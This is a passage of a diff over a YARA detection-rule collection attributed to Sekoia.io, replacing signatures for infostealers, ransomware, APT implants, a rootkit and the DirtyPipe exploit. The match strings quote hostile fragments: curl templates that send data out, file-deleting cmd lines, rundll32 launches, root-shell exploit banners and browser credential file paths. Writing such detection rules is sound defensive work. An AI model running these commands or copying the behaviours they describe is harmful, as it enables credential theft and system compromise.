-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_vhd_ransomware_downloader.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_stealc.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "042ab0029d170937af9b9ee6a8e499843532c84cf99faed3d2d47cb18a1500ac"
+		logic_hash = "60140c5a97494e6648dfce719ebce5644a3e05d4559d28874eb759b7d0e6a90e"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "rundll32.exe %s #1 %S" wide
-		$ = "cmd /c timeout /t 10 & Del /f /q \"%s\" & attrib -s -h \"%s\" & rundll32 \"%s\" #1" wide
-		$ = "cmd /c timeout /t 10 & rundll32 \"%s\" #1" wide
-		$ = "curl -A cur1-agent -L %s -s -d da"
-		$ = "curl -A cur1-agent -L %s -s -d dl"
+		$dec = { 55 8b ec 8b 4d ?? 83 ec 0c 56 57 e8 ?? ?? ?? ?? 6a 03 33 d2 8b f8 59 f7 f1 8b c7 85 d2 74 04 }
+		$str01 = "------" ascii
+		$str02 = "Network Info:" ascii
+		$str03 = "- IP: IP?" ascii
+		$str04 = "- Country: ISO?" ascii
+		$str05 = "- Display Resolution:" ascii
+		$str06 = "User Agents:" ascii
+		$str07 = "%s\\%s\\%s" ascii
 
 	condition:
-		filesize < 2MB and 3 of them
+		uint16( 0 ) == 0x5A4D and ( $dec or 5 of ( $str* ) )
 }
-rule SEKOIA_Infostealer_Win_Cinoshistealer : FILE
+rule SEKOIA_Apt_Cloudatlas_Stagescalldllmainafterexec
 {
 	meta:
-		description = "Finds Cinoshi Stealer samples based on specific strings, or PE resources"
+		description = "Detects call to dllmain after execution of exported function"
 		author = "Sekoia.io"
-		id = "2e9c066b-d5e3-4a25-8954-c10af285bcd3"
-		date = "2023-06-23"
+		id = "a24b7887-87f6-44e3-80c5-cd117e694595"
+		date = "2023-10-31"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_cinoshistealer.yar#L1-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_stagescalldllmainafterexec.yar#L1-L46"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c4d8418a7bd1bf205295100d993562c89b17b80889cad5aac7a74f89e66543ce"
+		logic_hash = "6d1c1717b4012e72b0069068158265dfd215cd7685a5489aba3de4a9024bfa28"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Anaida.exe" ascii wide
-		$str02 = "Anaida.pdb" ascii
-		$str03 = "embedder_download_data" ascii
-		$str04 = "date_password_modified" ascii
-		$str05 = "card_number_encrypted" ascii
-		$str06 = "set_UseZip64WhenSaving" ascii
-		$str07 = "set_CommandText" ascii
-		$str08 = "Nss3CouldNotBeLoaded" ascii
-		$str09 = "formhistory.sqlite" wide
-		$str10 = "logins.json" wide
-		$str11 = "\\nss3.dll" wide
-		$str12 = "\\cookies.sqlite" wide
-		$str13 = "\\places.sqlite" wide
-		$str14 = "\\autofill-profiles.json" wide
+		$chunk_1 = {
+        55
+        8B EC
+        83 EC 10
+        C7 45 ?? 00 00 00 00
+        83 7D ?? 00
+        74 ??
+        8B 45 ??
+        89 45 ??
+        8B 4D ??
+        8B 51 ??
+        03 55 ??
+        89 55 ??
+        8B 45 ??
+        8B 48 ??
+        03 4D ??
+        89 4D ??
+        6A 00
+        6A 00
+        FF 75 ??
+        FF 55 ??
+        68 00 80 00 00
+        6A 00
+        8B 55 ??
+        52
+        FF 15 ?? ?? ?? ??
+        C7 45 ?? 01 00 00 00
+        8B 45 ??
+        8B E5
+        5D
+        C2 04 00
+        }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 9 of them and filesize > 400KB
+		any of them
 }
-rule SEKOIA_Tool_Rsockstun_Strings : FILE
+
+rule SEKOIA_Dotnet_Injector_New_Payload : FILE
 {
 	meta:
-		description = "Detects Rsockstun based on strings"
+		description = "New dotnet injector"
 		author = "Sekoia.io"
-		id = "94d8cb39-3421-441c-8404-62a591b86912"
-		date = "2023-12-22"
+		id = "b0a1d471-5381-4fa8-8563-7e72ecd15bed"
+		date = "2022-12-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_rsockstun_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/dotnet_injector_new_payload.yar#L3-L30"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8faf1004ec56728f1e451734ed651e8f77a49faf7f232df82e0b4950a9f1d198"
+		logic_hash = "8b5e2f6e7947471e10e0ec85eef1cebe1904c2e77b7cfe92e578ebe306041842"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252076,26 +252059,34 @@ rule SEKOIA_Tool_Rsockstun_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "main.connectviaproxy"
-		$ = "main.connectForSocks"
-		$ = "main.listenForClients"
-		$ = "main.listenForSocks"
+		$f1 = "DownloadFile" ascii
+		$f2 = "StreamReader" ascii
+		$f3 = "ReadToEnd" ascii
+		$f4 = "Reverse" ascii
+		$f5 = "Load" ascii
+		$f6 = "StringToByteArray" ascii
+		$s1 = "Admin" wide
+		$s2 = "User" wide
+		$p1 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" wide
+		$p2 = ".lnk" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 10MB and all of them
+		filesize < 300KB and all of ( $f* ) and all of ( $s* ) and all of ( $p* ) and dotnet.is_dotnet
 }
-rule SEKOIA_Apt_Mustangpanda_Payload : FILE
+rule SEKOIA_Apt_Kimsuky_Fpspy : FILE
 {
 	meta:
-		description = "Decryption routine of mustang panda payload"
+		description = "Detects FPSpy, a backdoor used by Kimsuky"
 		author = "Sekoia.io"
-		id = "ce7ddf20-e13f-4b5f-8fff-4b1387b29568"
-		date = "2022-12-08"
+		id = "75d41851-a7a6-4068-8ea5-6a3e6e62a965"
+		date = "2024-09-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_payload.yar#L1-L42"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_fpspy.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "734d42aed4574de620773f1f2d08c6b1fc206efd1b576f0f3679edcc0b2ce91d"
+		hash = "6d6c1b175e435f5564341cc1f2c33ddf"
+		hash = "54c58b72f98cb63c44e7694add551e9d"
+		logic_hash = "65904b77a30b2e2a25f8d80ab32742f0ad931f07c034ae576a4fbde7e1fd999c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252103,92 +252094,57 @@ rule SEKOIA_Apt_Mustangpanda_Payload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        89 74 24 ??
-        B9 ?? ?? ?? ??
-        8B 44 24 ??
-        3D ?? ?? ?? ??
-        B8 ?? ?? ?? ??
-        0F 4C C1
-        E9 ?? ?? ?? ??
-        B8 ?? ?? ?? ??
-        31 DB
-        31 ED
-        31 FF
-        E9 ?? ?? ?? ??
-        8B 44 24 ??
-        B9 ?? ?? ?? ??
-        3B 44 24 ??
-        B8 ?? ?? ?? ??
-        0F 42 C1
-        E9 ?? ?? ?? ??
-        88 5C 24 ??
-        89 6C 24 ??
-        89 7C 24 ??
-        B9 ?? ?? ?? ??
-        8B 44 24 ??
-        3D ?? ?? ?? ??
-        B8 ?? ?? ?? ??
-        0F 4C C1
-        }
+		$ = "Chrome/31.0." wide
+		$ = "%srundll32.exe %s, %s %%1" wide
+		$ = "MazeFunc" wide
+		$ = "sys.dll" wide
+		$ = "KLog" wide
 
 	condition:
-		filesize < 8MB and all of them
+		uint16be( 0 ) == 0x4d5a and 4 of them
 }
-rule SEKOIA_Infostealer_Win_Vulturi : FILE
+rule SEKOIA_Apt37_Rokrat_Macho
 {
 	meta:
-		description = "Detect the Vulturi infostealer based on specific strings"
+		description = "Detects Public key of Macho samples of RokRAT"
 		author = "Sekoia.io"
-		id = "5369cbfb-ff94-4484-b5a4-894feeed97e1"
-		date = "2022-03-14"
+		id = "c54fb9ae-85fa-4c36-bab9-6c6d989262ba"
+		date = "2022-09-29"
 		modified = "2024-12-19"
-		reference = "https://lamp-ret.club/t/vulturi-cracked-by-tr0uble-and-eshelon_mayskih.193/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_vulturi.yar#L1-L35"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt37_rokrat_macho.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "2d442768499ea0d4b6f5ac0d85521d73bb8337a53f1641485b0ce0054e2dc91c"
+		logic_hash = "526dc4594db099ed8090a673e761f84f6dd7ce860e380214e4d3f1ec08fc2345"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 66
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$vul = "Vulturi_" ascii
-		$str01 = "/C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A" wide
-		$str02 = "SELECT ExecutablePath, ProcessID FROM Win32_Process" wide
-		$str03 = "Apps\\Gaming\\Minecraft" wide
-		$str04 = "Apps\\Gaming\\Steam\\Apps" wide
-		$str05 = "Messengers\\Facebook\\Contacts.txt" wide
-		$str06 = "Messengers\\Discord\\Tokens.txt" wide
-		$str07 = "Apps\\VPN\\NordVPN\\accounts.txt" wide
-		$str08 = "Apps\\VPN\\DUC\\credentials.txt" wide
-		$str09 = "System\\Screenshots\\Webcam.png" wide
-		$str10 = "System\\Screenshots\\Desktop.png" wide
-		$str11 = "GTA San Andreas User Files\\SAMP\\USERDATA.DAT" wide
-		$str12 = "http://ip-api.com/line?fields=query" wide
-		$str13 = "Wireshark" wide
-		$str14 = "KeePass.config.xml" wide
-		$str15 = "Apps\\TheBat!" wide
-		$str16 = "Vulturi" wide
-		$str17 = "StealerStub" wide
+		$s1 = { 4D 49 49 42 49 6A 41 4E 42 67 6B 71 68 6B 69 47 39 77 30 42 41 51 45 46 41 41 4F 43 41 51 38 41 4D 49 49 42 43 67 4B 43 41 51 45 41 73 47 52 59 53 45 56 76 77 6D 66 42 46 4E 42 6A 4F 7A 2B 51}
+		$s2 = {70 61 78 35 72 7A 57 66 2F 4C 54 2F 79 46 55 51 41 31 7A 72 41 31 6E 6A 6A 79 49 48 72 7A 70 68 67 63 39 74 67 47 48 73 2F 37 74 73 57 70 38 65 35 64 4C 6B 41 59 73 56 47 68 57 41 50 73 6A 79}
+		$s3 = {31 67 78 30 64 72 62 64 4D 6A 6C 54 62 42 59 54 79 45 67 35 50 67 79 2F 35 4D 73 45 4E 44 64 6E 73 43 52 57 72 32 33 5A 61 4F 45 4C 76 48 48 56 56 38 43 4D 43 38 46 75 34 57 62 61 7A 38 30 4C}
+		$s4 = {47 68 67 38 69 73 56 50 45 48 43 38 48 2F 79 47 74 6A 48 50 59 46 56 65 36 6C 77 56 72 2F 4D 58 6F 4B 63 70 78 31 33 53 31 4B 38 6E 6D 44 51 4E 41 68 4D 70 54 31 61 4C 61 47 2F 36 51 69 6A 68}
+		$s5 = {57 34 50 2F 52 46 51 71 2B 46 64 69 61 33 66 46 65 68 50 67 35 44 74 59 44 39 30 72 53 33 73 64 46 4B 6D 6A 39 4E 36 4D 4F 30 2F 57 41 56 64 5A 7A 47 75 45 58 44 35 33 4C 48 7A 39 65 5A 77 52}
+		$s6 = {39 59 38 37 38 36 6E 56 44 72 6C 6D 61 35 59 43 4B 70 71 55 5A 35 63 34 36 77 57 33 67 59 57 69 33 73 59 2B 56 53 33 62 32 46 64 41 4B 43 4A 68 54 66 43 79 38 32 41 55 47 71 50 53 56 66 4C 61}
+		$s7 = {6D 51 49 44 41 51 41 42}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( #vul > 50 or 12 of ( $str* ) )
+		all of them
 }
-
-rule SEKOIA_In2Al5D_P3In4Er_Loader : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_12 : FILE
 {
 	meta:
-		description = "Invalid printer loader detection based on the XOR key"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "6dd3046d-55fb-4bcc-8735-dbc0add4d570"
-		date = "2023-04-24"
+		id = "b69186cf-9825-4d90-be20-7caa9e7de61f"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/in2al5d_p3in4er_loader.yar#L3-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_12.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fb7dadcd1e87c15cacfc046e76648b1fa29f1bce44fa0314b84746ca57eebaed"
+		logic_hash = "5c9692337c0dd533c7e49bd3850feedad93b256bc2fba45af6121f50ad83f4cc"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252196,23 +252152,41 @@ rule SEKOIA_In2Al5D_P3In4Er_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$xor_key = "in2al5d p3in4er" ascii fullword
+		$ = "ms.Write(ba, 0, (length / 4) * 3);"
+		$ = "var serialized_obj = "
+		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);"
+		$ = "var sc ="
 
 	condition:
-		all of them and ( filesize > 4MB and filesize < 7MB ) and pe.is_pe
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Tool_Juicypotato_Exploit_Strings : FILE
+rule SEKOIA_Rootkit_Diamorphine_Strings : FILE
 {
 	meta:
-		description = "Detects the JuicyPotato exploit based on strings"
+		description = "Detects Diamorphine linux rootkit based on strings"
 		author = "Sekoia.io"
-		id = "03d697ae-69a7-490b-8b3c-9a8c21fb46a2"
-		date = "2022-09-09"
+		id = "5a28be5c-9a57-4204-a7cc-42dfcaa2c2da"
+		date = "2024-10-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_juicypotato_exploit_strings.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rootkit_diamorphine_strings.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ef23ea2931a1b6e094c0d7bb813305c09a2214ce36680ae057926dfdc1105c80"
+		hash = "622675e83bab630adc0f1c6c46c4d6d1"
+		hash = "013b23213975d2646e2435f058afcacf"
+		hash = "f068e83721f10ad74bb6f386a4375a91"
+		hash = "ba9d6a6bbde602fd414cea09fcbd1aa0"
+		hash = "fdd86788e295010c4e61bf6b589f340e"
+		hash = "0d396c1763503b35a7f601831bd684de"
+		hash = "66b8955188a3bda7ecdcd51cfd360313"
+		hash = "1e4fd8c6bf0e381ac395d9bff1f98a31"
+		hash = "ce08ce2b8bc1718052f5d0316e3e71b7"
+		hash = "94982037875d4fdb17681866afc12ade"
+		hash = "4fa2fe9ccde3e6bd4956e2b93ca5fcb6"
+		hash = "644c4ce0bbe4f1f1e3aae537a111d5b8"
+		hash = "fb7d594621fbb4f9bdb0eb74f6090ecd"
+		hash = "9faf1493164e734f533f0ecfb1737a98"
+		hash = "33d48b6c66715ab67a059ab940d759ff"
+		logic_hash = "70e2e9155181a717f1c2483a748d5991488f0ba7371a2b3c9cfada2ecc5812f9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252220,258 +252194,259 @@ rule SEKOIA_Tool_Juicypotato_Exploit_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "JuicyPotato v%s"
-		$ = "-t createprocess call: <t> CreateProcessWithTokenW"
-		$ = "-p <program>: program to launch"
-		$ = "-l <port>: COM server listen port"
-		$ = "-m <ip>: COM server listen address"
-		$ = "-n <port>: RPC server listen port"
-		$ = "Error - Unknown NTLM message type..."
-		$ = "[+] authresult %d"
-		$ = "Waiting for auth..."
+		$ = "LKM rootkit" ascii fullword
+		$ = "m0nad"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 2 of them
+		uint32be( 0 ) == 0x7f454c46 and all of them
 }
-rule SEKOIA_Ransomware_Win_Scransom : FILE
+rule SEKOIA_Apt_Polonium_Megacreep_Strings : FILE
 {
 	meta:
-		description = "Finds ScRansom samples based on specific strings"
+		description = "Tries to detect POLONIUM's MegaCreep implant"
 		author = "Sekoia.io"
-		id = "ea799295-1332-49c6-9816-035b91fc9b4f"
-		date = "2023-08-24"
+		id = "4d62d5bc-2ec9-58ef-bfe7-c0b04fa73b6f"
+		date = "2022-10-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_scransom.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_polonium_megacreep_strings.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3b8034bc5e0919d6c05dd2f2079c40836f241f2db02c1baf70ecb530db90847f"
+		logic_hash = "f4881e15854b082d8e6b8a28a7eb1518c559577b1b3ce76e404d67b1fe723fde"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		orig_id = "927c5fd6-0574-43bf-8db9-6ecc328estrin56c7"
 
 	strings:
-		$str01 = "TIMATOMAFULL" wide
-		$str02 = ".Encrypted" wide
-		$str03 = ".Encrypting" wide
-		$str04 = "File Name :" wide
-		$str05 = "File size :" wide
-		$str06 = "TIMATOMA#" wide
-		$str07 = "Already Encrypted" wide
-		$str08 = "HOW TO RECOVERY FILES.TXT" wide
-		$str09 = "%d folder(s) searched and %d file(s) found - %.3f second(s)" wide
-		$str10 = "Search cancelled -" wide
-		$str11 = "note.txt" wide
-		$str12 = "Cannot sort the list while a search is in progress." wide
-		$str13 = "Cancelling search, please wait..." wide
-		$str14 = "Error showing process list" wide
-		$str15 = "[System Process]" wide
-		$str16 = "taskkill /f /im" wide
-		$str17 = "kill.bat" wide
+		$ = "[#!#]" ascii wide
+		$ = "[$$%$$]" ascii wide
+		$ = ".e##x##e" ascii wide
+		$ = "WHLib.dll" ascii wide
+		$ = "TestService.txt" ascii wide
+		$ = "X = Stop" ascii wide
+		$ = "Sess.dll" ascii wide
+		$ = "filepathOnTarget" ascii wide
+		$ = "FileNameOnMega" ascii wide
+		$ = "Missing Parameter.. Format of command:" ascii wide
+		$ = "Your Old K##E##Y is Wronge" ascii wide
+		$ = "Your Upgrage Is Success" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 15 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 2MB and 3 of them
 }
-rule SEKOIA_Apt_Susp_Lazarus_Dangerous_Password : FILE
+
+rule SEKOIA_Wiper_Win_Ruransom : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detect the RURansom malware"
 		author = "Sekoia.io"
-		id = "726c8b92-7fbe-40f8-917a-cabd206028da"
-		date = "2023-09-12"
+		id = "7bf3694b-c689-482f-88cd-b1f3b86bbc36"
+		date = "2022-11-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_lazarus_dangerous_password.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_win_ruransom.yar#L4-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "2b159266bd6bba20ffaa627dac840840eaaad98e7962f48bbae428e687155b3d"
-		score = 65
+		logic_hash = "e16cfe7a273bfa01e2ae56174e6ea10a84d42542a62dda5e7b095a0c30082a31"
+		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".jpeg" wide
-		$ = "mshta"
+		$ = "RURansom"
+		$ = "AesCrypter"
+		$ = "RURansom" wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them and filesize < 5KB
+		uint16( 0 ) == 0x5A4D and all of them or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "e4b6b5b2b293d497ddf373ca9f7e97458328703d2769f451890ac48771c85070" )
 }
-rule SEKOIA_Tool_Win_Lightrail : FILE
+
+rule SEKOIA_Crybercrime_Prophetspider_Proxy : FILE
 {
 	meta:
-		description = "Detect the LIGHTRAIL tunneler used by UNC1549"
+		description = "Detects the Winntaa decryption loop or imphash"
 		author = "Sekoia.io"
-		id = "39259f2c-11fe-4edd-8a9e-f36920132272"
-		date = "2024-02-29"
+		id = "b7637fc3-bf81-40c4-869c-1c283574e0a7"
+		date = "2022-02-17"
 		modified = "2024-12-19"
-		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_lightrail.yar#L1-L24"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crybercrime_prophetspider_proxy.yar#L3-L41"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "84491bf7e955930c04e96f63ffb8c8f35ad02d9a917eceb727bf87c9ed3d831e"
+		logic_hash = "711ef3fc6ac488200415b7178c7f639ad9f6c72077bbebac2e6d5e0bed7120dd"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "e7ddab967b0487827db069833221aa2fe4ca05f7cda976cbc528ecb306a22774"
-		hash2 = "4ecd511d9654f7fd66a61eb4ab6d7153040b5092d1594ff39935f01fbdbd4914"
-		hash3 = "3472bc8ed6182eb17811c97ada7ebd48034ad09b6a7062b341fe09818d7a309f"
-		hash4 = "ec7b97092278123f0c0613c5f9252eeccf55265d4aa5f2cfed57a63ebf3530ac"
-		hash5 = "8f3757b8f5888a1303af71cbc1a106927d3d6c45552ee192c3ed0347804c2194"
-		hash6 = "8b47b5ed1ed7afcc9194e1350d4e1996bd91ca3204747b586f309f4609a1a4cc"
 
 	strings:
-		$s1 = "lastenzug.dll"
-		$s2 = "Lastenzug.dll"
-		$azure = ".cloudapp.azure.com" wide
+		$ = { 56
+        57
+        48 8D 95 F0 FE FF FF
+        31 C0
+        66 21 02
+        48 89 CE
+        AC
+        48 89 D7
+        4C 89 C2
+        88 D4
+        30 C2
+        0F B6 CA
+        48 89 95 E8 FE FF FF
+        AC
+        30 E0
+        AA
+        E2 FA
+        88 C8
+        AA
+        48 8D 85 F0 FE FF FF
+        48 8B 95 E8 FE FF FF
+        5F
+        5E
+        C3 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 1 of ( $s* ) and $azure
+		uint16be( 0 ) == 0x4d5a and ( all of them or pe.imphash ( ) == "55e0b8e5b4d787c680ada4e450789a4d" )
 }
-rule SEKOIA_Apt_Gamaredon_Gamaredon_Lnk_Usb_Spreader
+rule SEKOIA_Exploit_Linux_Eop_Dirtypipe_Strings : FILE
 {
 	meta:
-		description = "Detects Gamaredon LNK USB Spreader"
+		description = "Detects DirtyPipe Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "a0972e30-bfc5-48ff-b04b-382db8c08a54"
-		date = "2023-06-19"
+		id = "712d8a01-576e-4f43-a930-63dcdc535d93"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_gamaredon_lnk_usb_spreader.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_dirtypipe_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581"
-		logic_hash = "3adb2433eda559d9b32316f4733741b0fc8c576937b1decede8bc7d23b203a0e"
+		logic_hash = "0abb8de541acea57ced20f66c0aad7b010fea647996039809d36e94555dee204"
 		score = 75
-		quality = 64
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".CREatesHoRTCUt(" nocase ascii wide
-		$ = "cOPY-Item $enV:UsErprOfilE" nocase ascii wide
-		$ = "-dEsTInaTioN $Env:" nocase ascii wide
-		$ = " = GET-ChilDITem $drivE.nAMe" nocase ascii wide
-		$ = "STArt-SLEeP" nocase ascii wide
-		$ = "-eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy" nocase ascii wide
-		$ = "drIvETYPe='2'" nocase ascii wide
-		$ = ".iConloCaTiON = " nocase ascii wide
+		$ = "[+] hijacking suid binary.."
+		$ = "[+] dropping suid shell.."
+		$ = "[+] restoring suid binary.."
+		$ = "[+] popping root shell.."
 
 	condition:
-		7 of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Ransomware_Win_Shrinklocker
+
+rule SEKOIA_Infostealer_Win_Aurora_Str : FILE
 {
 	meta:
-		description = "Detects files related to the ShrinkLocker ransomware"
+		description = "Finds Aurora botnet samples based on characteristic strings."
 		author = "Sekoia.io"
-		id = "93a6fbdd-ad62-456a-a1a5-b5ae3b242004"
-		date = "2024-06-07"
+		id = "1f4391b8-700f-4702-9ef6-68ce3d55a176"
+		date = "2022-07-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_shrinklocker.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_aurora_str.yar#L3-L34"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7770b0946b9bb482f23c4ce0d753393e0d42a6fd8b31029847d74356296f0cf1"
+		logic_hash = "745443bb58f00cb09a1f323f530219913eaaf0d0e71c9a25af2072006f8c5f92"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a = "shrinkdisk" ascii fullword
-		$b = "BitLocker" ascii fullword
-		$c = "diskpart" ascii fullword
-		$d = "disk.vbs" ascii fullword
-		$e = "strDriveLetter" ascii fullword
-		$f = "shrinkcomplate" ascii fullword
-		$g = "ADODB.Stream" ascii fullword
-		$h = "Win32_OperatingSystem" ascii fullword
-		$i = "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server" ascii fullword
-		$j = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" ascii fullword
-		$k = "HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE" ascii fullword
+		$str01 = "Logs.tar" ascii
